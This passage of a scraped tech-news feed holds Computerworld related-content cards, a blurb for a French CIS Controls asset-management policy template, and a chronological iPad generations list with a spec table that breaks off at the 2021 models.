					<div class="card__header"><span class="card__content-type">conference</span><span class="card__external-link-icon" data-url="https://event.foundryco.com/cso-awards-conference-uk/"><svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <use xlink:href="#icon-arrow-up-right-from-square"></use></svg></span></div><h3 class="card__title">CSO Awards &amp; Conference UK</h3><div class="card__info card__info--light"><span>26 Nov 2026</span><span>London, UK</span></div>
		<div class="card__tags"><span class="card__tag"><span class="tag">Cyberattacks</span></span></div></div>
			</div>
		</a></div><div class="suggested-content-upcoming-events__button-container container">
						<a class="button" href="https://www.computerworld.com/events/"> View all events</a>
					</div>
				
			</section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><section class="related-content-resources">
				<div class="container">
				<h2 class="related-content-resources__title">Resources</h2><div class="grid related-content-resources__content"><div class="col-12 col-7@md col-8@lg grid grid--cols-7@md grid--cols-8@lg related-content-resources__main-content">
			<div class="col-12 col-7@md col-6@lg">
				<a class="card card--xxl" href="https://us.resources.computerworld.com/resources/accelerate-your-cloud-migration-with-atlassian-fastshift-6?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
					<div class="card__header">
						<span class="card__content-type">whitepaper</span>
					</div>
					<h3 class="card__title">Accelerate your cloud migration with Atlassian FastShift</h3>
					<p class="card__description"></p><p>Turn an Atlassian cloud migration into a faster, more predictable transformation. In this session, you’ll walk through the FastShift playbook.</p>
<p>The post <a rel="nofollow" href="https://com.wp.idg.zone/resources/accelerate-your-cloud-migration-with-atlassian-fastshift-6/">Accelerate your cloud migration with Atlassian FastShift</a> appeared first on <a rel="nofollow" href="https://com.wp.idg.zone/">Whitepaper Repository –</a>.</p>

					<div class="card__info">
						<span>
						By 
						Atlassian
						</span>
					</div>
					<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
			</div>
			<div class="col-2 related-content-resources__featured-image-wrapper">
				<img width="400px" loading="lazy" class="related-content-resources__image-featured" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040704.83.png" alt="Image">
			</div>
		</div><div class="col-12 col-5@md col-4@lg col-start-9@lg related-content-resources__cards"><div class="grid grid--cols-5@md grid--cols-4@lg related-content-resources__card-wrapper">
				<div class="col-12 col-5@md col-3@lg">
					<a class="card card--sm" href="https://us.resources.computerworld.com/resources/warum-sich-teams-fur-cloud-entscheiden-9?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
						<div class="card__header">
							<span class="card__content-type">whitepaper</span>
						</div>
						<h3 class="card__title">Warum sich Teams für Cloud entscheiden</h3>
						<div class="card__info">
							<span>
							By 
							Atlassian
							</span>
						</div>
						<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
				</div>
				<div class="col-1">
					<img width="400px" loading="lazy" class="related-content-resources__image-side" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040716.4772.png" alt="Image">
				</div>
			</div><div class="grid grid--cols-5@md grid--cols-4@lg related-content-resources__card-wrapper">
				<div class="col-12 col-5@md col-3@lg">
					<a class="card card--sm" href="https://us.resources.computerworld.com/resources/pourquoi-les-equipes-optent-pour-la-solution-cloud-3?utm_source=rss-feed&amp;utm_medium=rss&amp;utm_campaign=feed" rel="noreferrer" aria-label="Go to content">
						<div class="card__header">
							<span class="card__content-type">whitepaper</span>
						</div>
						<h3 class="card__title">Pourquoi les équipes optent pour la solution cloud</h3>
						<div class="card__info">
							<span>
							By 
							Atlassian
							</span>
						</div>
						<div class="card__info card__info--light"><span>14 Jul 2026</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Business Operations</span></span><span class="card__tag"><span class="tag">Cloud</span></span><span class="card__tag"><span class="tag">Digital Transformation</span></span></div></a>
				</div>
				<div class="col-1">
					<img width="400px" loading="lazy" class="related-content-resources__image-side" src="https://us.resources.computerworld.com/wp-content/uploads/2026/07/atl_logo1784040728.9116.png" alt="Image">
				</div>
			</div></div>
		</div><div class="related-content-resources__button-container">
			<a class="button" target="_blank" href="https://us.resources.computerworld.com/"> View all </a>
		</div></div>
			</section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><section class="related-content-podcasts"><div class="container"><h2 class="related-content-podcasts__title">Podcasts</h2><div class="grid related-content-podcasts__content"><a class="col-12 col-7@md col-8@lg grid grid--cols-7@md grid--cols-8@lg related-content-podcasts__main-content" href="https://www.computerworld.com/podcasts/2-minute-tech-briefing/" aria-label="Go to content"><div class="col-12 col-7@md col-2@lg related-content-podcasts__image">
			<div class="image image--aspect-ratio-1-1">
				<img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2025/11/100065453-0-01782600-1762961273-2-min-tech-briefing-logo-16x9-4.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Image">
			</div>
		</div><div class="col-12 col-7@md col-6@lg"><div class="card card--xl"><div class="card__header"><span class="card__content-type"> podcasts</span></div><h3 class="card__title">2-Minute Tech Briefing</h3><p class="card__description">Catch up on the latest enterprise IT news in a fast-paced video briefing with host Arnold Davick. Listen to the show on Computerworld, YouTube, Apple and Spotify.</p><div class="card__info card__info--light"><span>81  episodes</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Emerging Technology</span></span></div></div></div></a><ul class="col-12 col-5@md col-4@lg col-start-9@lg related-content-podcasts__cards"><li class="related-content-podcasts__card"><a href="https://www.computerworld.com/podcast/4176380/microsoft-copilot-growth-claudebleed-risk-linkedin-gdpr-complaint-ep-84.html" aria-label="Go to episode"><div class="related-content-podcasts__episode-label">
			<span class="episode-label">
				<span> Ep. 81</span>
				<span>
				<svg class="icon" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
					<use xlink:href="#icon-podcast"></use>
				</svg>
			</span>
			</span>
		</div><div class="card card--xs"><h3 class="card__title">Microsoft Copilot Growth, ClaudeBleed Risk, LinkedIn GDPR Complaint | Ep. 84</h3><div class="card__info">
				<span>By Arnold Davick</span>
			</div><div class="card__info card__info--light">
			<span>Mar 20, 2024</span><span>2 mins</span>
		</div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></a></li><li class="related-content-podcasts__card"><a href="https://www.computerworld.com/podcast/4176367/chrome-gemini-ai-agents-cisa-infrastructure-cyber-resilience-ep-83.html" aria-label="Go to episode"><div class="related-content-podcasts__episode-label">
			<span class="episode-label">
				<span> Ep. 80</span>
				<span>
				<svg class="icon" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
					<use xlink:href="#icon-podcast"></use>
				</svg>
			</span>
			</span>
		</div><div class="card card--xs"><h3 class="card__title">Chrome Gemini, AI Agents, CISA Infrastructure Cyber Resilience | Ep. 83</h3><div class="card__info">
				<span>By Arnold Davick</span>
			</div><div class="card__info card__info--light">
			<span>Mar 20, 2024</span><span>2 mins</span>
		</div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></a></li></ul></div></div></section><section class="related-content-video"><div class="container"><h2 class="related-content-video__title">Video on demand</h2><div class="grid related-content-video__main">        <div class="col-12 col-4@lg related-content-video__main-card card card--xl">
            <div class="card__header"><span class="card__content-type">video</span></div>            
            <a class="card card--xl" href="https://www.computerworld.com/video/4196734/why-ai-agents-fail-when-enterprises-dont-define-the-job.html" aria-label="Go to content">
                <h3 class="card__title">Why AI agents fail when enterprises don’t define the job</h3>            </a>
                            <p class="card__description mt-3">Enterprises are investing heavily in AI agents, but many projects fail when companies skip clear goals, guardrails, governance and success metrics.</p>
            
                         <div class="card__info card__info--light"><span>Jul 14, 2026 </span><span>33 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">IT Governance</span></span></div>        </div>
                <div class="col-12 col-8@lg related-content-video__video">
                            <div class="youtube-video">
                    &gt;
					
				</div>                </div>
                    </div>
        </div><div class="related-content-video__cards-container">
                        <div class="related-content-video__cards-wrap">
                            <ul class="grid related-content-video__cards">        <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4193952/why-enterprise-ai-projects-stall-before-delivering-real-value.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4193952-0-52301800-1783446508-youtube-thumbnail-gu6x40jhZ1s_3cbf50.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">Why enterprise AI projects stall before delivering real value</h3>
                                         <div class="card__info card__info--light"><span>Jul 7, 2026 </span><span>29 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">ROI and Metrics</span></span></div>                </div>
            </a>
        </li>
                <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4191262/how-ai-is-breaking-job-interviews-skills-testing-and-evaluation.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4191262-0-24248500-1782847008-youtube-thumbnail-lVEejCXC4lU_b223c5.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">How AI is breaking job interviews, skills testing and evaluation</h3>
                                         <div class="card__info card__info--light"><span>Jun 30, 2026 </span><span>32 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Hiring</span></span><span class="card__tag"><span class="tag">IT Skills and Training</span></span></div>                </div>
            </a>
        </li>
                <li class="col-4@md related-content-video__card">
            <a class="related-content-video__card-link" href="https://www.computerworld.com/video/4188534/how-ai-is-reshaping-cybersecurity.html" aria-label="Go to content">
                <div class="related-content-video__card-image">
                    <div class="image">
                        <img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4188534-0-45176600-1782243369-youtube-thumbnail-5DLoQMU0nZc_de9df9.jpg?quality=50&amp;strip=all&amp;w=300" alt="Image" sizes="300px">
                    </div>
                </div>
                <div class="card card--xs">
                    <h3 class="card__title">How AI is reshaping cybersecurity</h3>
                                         <div class="card__info card__info--light"><span>Jun 23, 2026 </span><span>44 mins</span></div>                    <div class="card__tags"><span class="card__tag"><span class="tag">Cyberattacks</span></span><span class="card__tag"><span class="tag">Cybercrime</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div>                </div>
            </a>
        </li>
        </ul></div></div><div class="related-content-video__button-container"><a class="button" target="_self" href="https://www.computerworld.com/videos/">See all videos</a></div></section></div><section class="suggested-content-various"><div class="container"><div class="grid suggested-content-various__content"><div class="col-12 col-3@lg">
			<h2 class="suggested-content-various__title">Show me more</h2><div class="suggested-content-various__filters"><span class="suggested-content-various__filter"><button class="chip chip--filter chip--active" type="button" data-filter-key="latest">Latest</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="article">Articles</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="podcast">Podcasts</button></span><span class="suggested-content-various__filter"><button class="chip chip--filter" type="button" data-filter-key="video">Videos</button></span></div>
		</div><div class="col-12 col-9@lg suggested-content-various__items-wrap"><div class="grid grid--cols-9@lg suggested-content-various__items"><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4195055/apple-finally-calls-time-on-15-year-old-device-support.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">opinion</span> </div> <h3 class="card__title">Apple finally calls time on 15-year-old device support</h3> <div class="card__info"><span>By Jonny Evans</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T16:15:14+00:00">Jul 9, 2026</span><span>4 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Smartphones</span></span><span class="card__tag"><span class="tag">iPhone</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4195055-0-47500100-1783613766-iPhone4s_3up_Photo_Siri_Sprgbd_PRINT.jpg?quality=50&amp;strip=all&amp;w=219" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4194931/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">brandpost</span> <span class="card__sponsor-text">Sponsored by Tether</span></div> <h3 class="card__title">Physical AI will see the fusion of robotics and AI transform the world</h3> <div class="card__info"><span>By tether</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T11:11:53+00:00">9 Jul 2026</span><span>6 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4194931-0-76347600-1783595551-QVAC-Paid-Ad-1-_-1200-x-800.png?w=375" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				article"><a class="suggested-content-various__link" href="https://www.computerworld.com/article/4194914/spacexai-launches-grok-4-5-touts-lower-coding-task-costs-than-ai-rivals-2.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">news</span> </div> <h3 class="card__title">SpaceXAI launches Grok 4.5, touts lower coding-task costs than AI rivals</h3> <div class="card__info"><span>By Prasanth Aby Thomas</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-07-09T10:26:11+00:00">Jul 9, 2026</span><span>5 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Developer</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4194914-0-24417700-1783592810-AI-vibe-coding-one-hand-is-robot-one-hand-is-human.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4176380/microsoft-copilot-growth-claudebleed-risk-linkedin-gdpr-complaint-ep-84.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">Microsoft Copilot Growth, ClaudeBleed Risk, LinkedIn GDPR Complaint | Ep. 84</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-22T15:04:16+00:00">May 22, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-46106000-1779462321-youtube-thumbnail-5PkKYThsKy8.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4176367/chrome-gemini-ai-agents-cisa-infrastructure-cyber-resilience-ep-83.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">Chrome Gemini, AI Agents, CISA Infrastructure Cyber Resilience | Ep. 83</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-22T14:53:18+00:00">May 22, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-06017100-1779461653-youtube-thumbnail-XH7vduM7uz8.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				podcast"><a class="suggested-content-various__link" href="https://www.computerworld.com/podcast/4172579/ai-triage-gains-model-reviews-ask-jeeves-shutdown-ep-82.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">podcast</span> </div> <h3 class="card__title">AI Triage Gains, Model Reviews, Ask Jeeves Shutdown | Ep. 82</h3> <div class="card__info"><span>By Arnold Davick</span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-05-18T19:31:15+00:00">May 18, 2026</span><span>2 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/05/0-62824900-1779132751-youtube-thumbnail-P3R6blMndrU.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				latest,video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4185559/why-ai-agents-could-create-a-new-control-and-security-crisis.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">Why AI agents could create a new control and security crisis</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-16T11:47:15+00:00">Jun 16, 2026</span><span>28 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">IT Governance</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4185559-0-48713800-1781610470-youtube-thumbnail-uPpd9EJ4iNI_55eb26.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4182978/does-quality-suffer-when-ai-generates-code.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">Does quality suffer when AI generates code?</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-09T14:32:51+00:00">Jun 9, 2026</span><span>35 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Code Security</span></span><span class="card__tag"><span class="tag">Developer</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4182978-0-61230000-1781015610-youtube-thumbnail-1hAfDQkuyhs_faa994.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div><div class="col-4@md col-3@lg suggested-content-various__item suggested-content-various__item--active" data-filter-value="
				video"><a class="suggested-content-various__link" href="https://www.computerworld.com/video/4180043/what-happens-when-ai-starts-selling-to-ai.html" aria-label="Go to content"><div class="card">
					<div class="card__header">
						<span class="card__content-type">video</span> </div> <h3 class="card__title">What happens when AI starts selling to AI?</h3> <div class="card__info"><span></span></div><div class="card__info card__info--light"><span itemprop="datePublished" content="2026-06-02T15:00:42+00:00">Jun 2, 2026</span><span>38 mins</span></div>
				 <div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Procurement Software</span></span><span class="card__tag"><span class="tag">Salesforce Automation </span></span></div></div>
					<div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4180043-0-78180900-1780412479-youtube-thumbnail-jPv-TAenlto_c79318.jpg?quality=50&amp;strip=all&amp;w=444" alt="Image"></div>
				</a>
			</div></div></div></div></div></section>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise Asset Management Policy Template for the CIS Controls v8.1 (French)]]></title>
<description><![CDATA[The Enterprise Asset Management Policy Template for CIS Controls v8.1 in French helps organizations inventory, track, and manage enterprise assets across physical, virtual, and cloud environments.]]></description>
<link>https://tsecurity.de/de/3669333/it-security-nachrichten/enterprise-asset-management-policy-template-for-the-cis-controls-v81-french/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669333/it-security-nachrichten/enterprise-asset-management-policy-template-for-the-cis-controls-v81-french/</guid>
<pubDate>Wed, 15 Jul 2026 02:37:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Enterprise Asset Management Policy Template for CIS Controls v8.1 in French helps organizations inventory, track, and manage enterprise assets across physical, virtual, and cloud environments.]]></content:encoded>
</item>
<item>
<title><![CDATA[iPad Generations List: Every Apple Model from 2010 to 2026]]></title>
<description><![CDATA[This is your definitive, chronological tour of the iPad. We’ll walk through every generation, what Apple shipped, the big firsts, and how each model pushed tablets forward. Bookmark it for reference and collecting, or to spot the exact iPad you own.



Before you start




Naming is messy. Apple ...]]></description>
<link>https://tsecurity.de/de/3668670/ios-mac-os/ipad-generations-list-every-apple-model-from-2010-to-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668670/ios-mac-os/ipad-generations-list-every-apple-model-from-2010-to-2026/</guid>
<pubDate>Tue, 14 Jul 2026 18:34:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is your definitive, chronological tour of the iPad. We’ll walk through every generation, what Apple shipped, the big firsts, and how each model pushed tablets forward. Bookmark it for reference and collecting, or to spot the exact iPad you own.



Before you start




Naming is messy. Apple mixes “iPad,” “iPad Air,” “iPad mini,” and “iPad Pro,” plus year/generation numbers. We’ll spell out each clearly.



Ports &amp; Pencils change a lot. 30-pin → Lightning → USB-C; Apple Pencil (1st) → Pencil (2nd) → Pencil (USB-C) → Pencil Pro.



Sizes shift. Classic 9.7-inch gave way to 10.2, 10.5, 10.9, 11, 12.9, 13 inches—and a tiny 7.9/8.3-inch mini.



Chips leap. A-series to Apple silicon (M-series) with desktop-class features.




The iPad Timeline, Every Generation, In Order



2010 — iPad (1st generation)







The original iPad landed like a new kind of computer: a 9.7-inch multi-touch slab running iPhone OS 3.2 on Apple’s A4 chip. No cameras, a 30-pin dock connector, and a 1024×768 IPS screen—but a bold idea: web, email, books, and apps in your hands. It sold millions and cemented the tablet as a mainstream device. 



2011 — iPad 2







A landmark refinement: 33% thinner, lighter, now with front and rear cameras, the new A5 chip, and the magnetic Smart Cover that woke the iPad when opened. Same 9.7-inch resolution, much faster feel. This design ethos—thinner, lighter, smarter—became iPad’s north star. 



2012 (Spring) — iPad (3rd generation)







“The new iPad” debuted the Retina display at 2048×1536—stunning at the time—powered by A5X for the heavier graphics load. It also added LTE options. Short life, huge impact: Retina became the baseline for Apple screens. 



2012 (Fall) — iPad (4th generation)







A fast mid-year pivot brought the A6X chip and, crucially, Lightning replacing the 30-pin connector—aligning iPad with the iPhone 5 ecosystem and opening an era of smaller, reversible cables. 



2012 — iPad mini (1st generation)







A beloved 7.9-inch form factor appeared with an A5 chip and a 1024×768 display. The mini made iPad one-handable and travel-friendly; its size would become a cult favorite for reading and fieldwork. 



2013 — iPad Air (1st generation)







The “Air” name said it all: a dramatically lighter 9.7-inch chassis with A7 (64-bit), ushering in desktop-style architectures on iPad. Sleek, efficient, future-proof. 



2013 — iPad mini 2 (Retina)







The mini caught up with Retina and A7 performance, shrinking few-compromise iPad power into a small body. (Mini 3 in 2014 added Touch ID but kept similar internals.)



2014 — iPad Air 2







The first laminated display with anti-reflective coating, a big visual upgrade, plus the A8X chip and Touch ID. Air 2 stayed relevant for years—many still consider it a classic. 



2015 — iPad mini 4







A meaningful update with a thinner build and A8; it became the long-lived “good enough” mini while Pro development accelerated.



2015 — iPad Pro 12.9 (1st generation)







iPad grew up—literally—with a 12.9-inch display, quad speakers, A9X, and two accessories that redefined the platform: Apple Pencil (1st gen) and Smart Keyboard. Creative pros and note-takers took notice; latency and precision changed the conversation about tablets. 



2016 — iPad Pro 9.7







A smaller Pro introduced True Tone and a color-sensitive ambient sensor—Apple’s screens started adapting to your environment. Cameras also leapt ahead here.



2017 — iPad (5th generation)







Apple rebooted the entry iPad: affordable 9.7-inch model with A9. No Pencil support yet, but it set a template for the value tier. 



2017 — iPad Pro 10.5 &amp; 12.9 (2nd gen)







ProMotion 120Hz arrived, making iPad feel instantly smoother—scrolling, gaming, Pencil latency, everything. It’s one of the biggest “you can feel it” upgrades in iPad history. 



2018 — iPad (6th generation)







The budget iPad finally gained Apple Pencil (1st gen) support, opening digital handwriting and art to schools and casual creators without Pro prices. 



2018 — iPad Pro 11 (1st) &amp; 12.9 (3rd)







The design reset: USB-C, Face ID, edge-to-edge “Liquid Retina,” no home button, and Apple Pencil (2nd gen) that snapped on magnetically to pair/charge. This set today’s Pro identity. 



2019 — iPad mini (5th) and iPad Air (3rd, 10.5-inch)







Both moved to A12 and Pencil (1st) support; Air gained Smart Keyboard compatibility, becoming the “most iPad for most people” mid-tier. 



2019 — iPad (7th generation)







A new 10.2-inch size and Smart Connector brought keyboard support to the base iPad—great for typing and students.



2020 — iPad Pro (A12Z, 2nd-gen 11-inch / 4th-gen 12.9)







Refined Pros with LiDAR for AR and a Magic Keyboard with trackpad, steering iPad toward laptop-style workflows. 



2020 — iPad (8th) and iPad Air (4th, 10.9-inch)







Entry iPad jumped to A12, while Air 4 adopted the Pro-like design, USB-C, and Apple Pencil (2nd)—a huge value shift that blurred the Pro line from below. 



2021 — iPad Pro (M1), iPad (9th), iPad mini (6th)







The Pros moved to Apple’s M1 with Thunderbolt; the 12.9-inch added mini-LED XDR for HDR punch. The base iPad got A13 and Center Stage. The mini 6 was reborn: 8.3-inch, USB-C, and Pencil (2nd) support—tiny, powerful, modern. 



2022 — iPad Air (5th, M1), iPad (10th), iPad Pro (M2)







Air gained M1; the 10th-gen iPad switched to USB-C with a landscape camera (but awkwardly used Pencil (1st) via an adapter). Pros with M2 added Apple Pencil hover—a nuanced but meaningful creator feature. 



2024 — iPad Pro (M4, Ultra Retina XDR OLED) &amp; iPad Air (M2, 11- and 13-inch)







The Pro made its biggest leap since 2018: tandem OLED (“Ultra Retina XDR”), the M4 chip, the thinnest Apple product ever, and the debut of Apple Pencil Pro (squeeze, barrel roll, haptics). The Air moved to M2 and gained a 13-inch size. Apple dropped the 9th-gen iPad and lowered the 10th-gen price.



2024 (Fall) — iPad mini (7th, A17 Pro)







Mini caught up with a big internal jump, adopting A17 Pro and the latest Pencil options while keeping the 8.3-inch portability fans love. 



2025 (Spring) — iPad Air (M3)







A swift spec bump to M3 kept Air squarely in the “sweet spot” for performance-per-dollar, alongside the modern Magic Keyboard and Pencil lineup.



2025 (Spring) — iPad (11th Generation)







The iPad (11th generation) is Apple’s latest refresh of its most popular tablet. Powered by the A16 Bionic chip, it offers faster performance, improved multitasking, and better efficiency compared to the previous A14-based iPad.



Spec Comparison



YearModelChipPortApple Pencil SupportKey Highlights2010iPad 9.7″ (1st gen)A430-pin—First iPad; 1024×768 IPS display2011iPad 2A530-pin—First with cameras; Smart Cover support2012iPad (3rd gen)A5X30-pin—First Retina display (2048×1536)2012iPad (4th gen)A6XLightning—Lightning replaces 30-pin connector2012iPad mini (1st, 7.9″)A5Lightning—First iPad mini2013iPad Air (1st)A7 (64-bit)Lightning—First 64-bit iPad; thinner design2013iPad mini 2A7Lightning—First Retina mini2014iPad Air 2A8XLightning—First laminated + anti-reflective display2015iPad mini 4A8Lightning—Slimmer, more powerful mini2015iPad Pro 12.9″ (1st)A9XLightning1st genFirst Apple Pencil; quad speakers2016iPad Pro 9.7″A9XLightning1st genTrue Tone display debuts2017iPad (5th gen)A9Lightning—Budget iPad line returns2017iPad Pro 10.5″ / 12.9″ (2nd)A10XLightning1st genFirst ProMotion 120Hz display2018iPad (6th gen)A10Lightning1st genPencil support comes to base iPad2018iPad Pro 11″ / 12.9″ (3rd)A12XUSB-C2nd genFace ID, no Home button, new design2019iPad mini 5A12Lightning1st genA12 performance in mini2019iPad Air 3 (10.5″)A12Lightning1st genSmart Keyboard support2019iPad (7th gen, 10.2″)A10Lightning1st genSmart Connector on base iPad2020iPad Pro (A12Z)A12ZUSB-C2nd genAdds LiDAR, Magic Keyboard with trackpad2020iPad Air 4 (10.9″)A14USB-C2nd genBrings Pro-style design to Air2020iPad (8th gen)A12Lightning1st genValue refresh2021iPad Pro (M1)M1USB-C / Thunderbolt2nd genFirst with M-series chip; mini-LED XDR (12.9″)2021iPad (9th gen)A13Lightning1st genCenter Stage front camera2021iPad mini 6 